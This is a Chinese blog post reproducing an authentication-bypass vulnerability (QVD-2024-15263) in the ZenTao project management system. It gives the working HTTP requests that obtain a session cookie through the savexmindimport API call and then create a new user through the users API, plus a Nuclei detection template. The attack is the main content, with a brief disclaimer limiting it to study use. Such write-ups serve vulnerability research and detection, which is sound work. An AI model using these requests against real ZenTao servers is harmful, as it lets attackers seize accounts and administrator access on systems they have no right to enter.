首页 > 其他分享 >禅道项目管理系统权限绕过漏洞(QVD-2024-15263)

禅道项目管理系统权限绕过漏洞(QVD-2024-15263)

时间:2024-07-29 10:33:50浏览次数:16  
标签:HTTP 1.1 QVD 2024 Host api 15263 php 禅道

本文所涉及的任何技术、信息或工具,仅供学习和参考之用,请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者无关。请遵守《中华人民共和国网络安全法》。

1. 概述

1.1 基本信息

禅道是一款支持敏捷、瀑布、看板等多种项目模型的开源项目管理软件,可完整覆盖研发项目的需求、任务、缺陷、用例、质量、组织知识库等流程。禅道提供多个版本,包括免费的开源版、付费的企业版、旗舰版、IPD版和云禅道,以及DevOps平台版,满足不同行业和规模的项目管理需求。

1.2 问题描述

禅道项目管理系统存在身份认证绕过漏洞,未经身份认证攻击者可利用该漏洞调用任意API接口并更改任意用户的密码,随后可以以管理员的身份登录该系统,结合未知的认证后远程代码执行漏洞可以完全控制服务器。

1.3 影响范围

v16.x <= 禅道 < v18.12 (开源版)
v6.x <= 禅道 < v8.12 (企业版)
v3.x <= 禅道 < v4.12 (旗舰版)

2. 漏洞复现

2.1 获取cookie

GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=jtexhqkbflxckrrolpbc&branch=luqmyuqbafmjejbvjixf HTTP/1.1
Host: {{hostname}}

获得Cookie: zentaosid=002c78f075e326c5cb0f496e8c30066a

2.2、绕过测试

GET /zentao/api.php/v1/lists HTTP/1.1
Cookie: zentaosid=002c78f075e326c5cb0f496e8c30066a
Host: {{hostname}}

显示为无接口,并不是未授权即可。

2.3 添加用户接口测试

POST /zentao/api.php/v1/users HTTP/1.1
Cookie: zentaosid=XXXXXXX
Host: {{hostname}}
 
{"account":"test","password":"admin@123",
"realname":"test",
"role":"",
"group":"2"
}

返回201Created即证明添加用户成功。

2.4 验证

使用该用户登录后台

NUCLEI检测POC

id: ChanDao_PermissionBypass
 
info:
  name: ChanDao_PermissionBypass
  author: ffff5
  severity: medium
  description: chandao_permissionbypass api.php 
  reference:
  - https://github.com/
  - https://cve.mitre.org/
  metadata:
    max-request: 1
    shodan-query: ""
 
 
requests:
- raw:
  - |+
    @timeout: 30s
    GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=xevscpierwzxcolrlykp&branch=ejlyosowumhxetlxbfet HTTP/1.1
    Host: {{Hostname}}
 
  - |+
    @timeout: 30s
    GET /api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=xevscpierwzxcolrlykp&branch=ejlyosowumhxetlxbfet HTTP/1.1
    Host: {{Hostname}}
 
 
 
  matchers-condition: and
  matchers:
    - type: word
      words: 
        - '"status":"success"'
    - type: status
      status:
        -  200 
 

标签:HTTP,1.1,QVD,2024,Host,api,15263,php,禅道
From: https://www.cnblogs.com/ffff5/p/18329529

相关文章

  • 【2024-07-26】连岳摘抄
    23:59一定要重视家和经营好家。同时,中国是一个差序格局社会,其他组织都是以家为同心圆的延拓,你们也要爱自己所服务的组织,爱所在的社区,爱自己的国家。                                        ......
  • 【2024-07-25】连岳摘抄
    23:59我们从来不搞一鸣惊人的事情,我们什么事情都慢慢来,实际上很快。                                                 ——XXX人的记忆,倾向于记住不愉快的事,而忽视愉......
  • 【2024-07-24】连岳摘抄
    23:59处事要代人作想,读书须切己用功。                                                 ——王永彬万一不得不一个人过这一生,有几点建议:一是同意你的“孝敬父母”,养......
  • 2024年中国AI基础数据服务研究报告(附下载)
    点击访问我的技术博客https://ai.weoknow.comhttps://ai.weoknow.com......
  • 【新方法】1分钟搞定2024暑期教师研修!(7.29更新)
    写在前面代码失效,现在采用修复后的油猴脚本,跟代码区别就是隔几秒再点下一个视频即可,学时可以记录上。仅限于中小学,职教和高教不可以。不会操作可以绿泡泡daikan856.脚本https://greasyfork.org/zh-CN/scripts/486386-2024年智慧中小学暑假教师研修-秒过-每个视频只点1遍-不懂先......
  • NOI2024 摆烂记
    某菜鸡初三Oier的NOID类游记。。。。Day-8~Day-2因为重庆育才有冲刺NOI的训练(其实就是多校联考),所以我提前几天来到了重庆。然后就是正常的多校集训。最后一天休息时还去爬了山,不得不说重庆是真的热,爬完真的累死我了。Day-1下午是报道,然后就逛了一下CQYC。食堂还是自助,而......
  • 2024世界人工智能大会:智象未来(HiDream.ai)入围多行业示范性应用案例
    在刚刚闭幕的世界人工智能大会(2024WAIC)上,智象未来(HiDream.ai)依托自身领先的行业技术,入围多行业示范性应用案例,充分展示了其在人工智能领域的卓越成就和创新能力。会上,智象未来(HiDream.ai)联合创始人兼CTO姚霆博士正式推出了备受期待的“智象大模型2.0”。新一代多模态大模型......
  • 2024-07-29 如何判断自定义组件中的slot是否被传入值==》defineSlots或this.$slots
    假如你的自定义组件是这样:<template><div><button:class="`btn-${type}`"><slot></slot></button></div></template><script>exportdefault{name:"tButt......
  • 2024.7.26
    1.string函数族改写,用指针修改。strlenstrcatstrcpystrcmp......
  • 2024暑假总结1
    DataStructure总结:Day1(6.27)今天主要看了平衡树,线段树为主题的题。通常来说,涉及到翻转一个区间,那就肯定要用平衡树,平衡树的话,推荐Splay,比较好写,缺点就是常数较大。对于平衡树和线段树,最重要的点就是想每个点需要维护哪些值,对于两个区间,怎么去合并这些值。比如要求一个大问题的......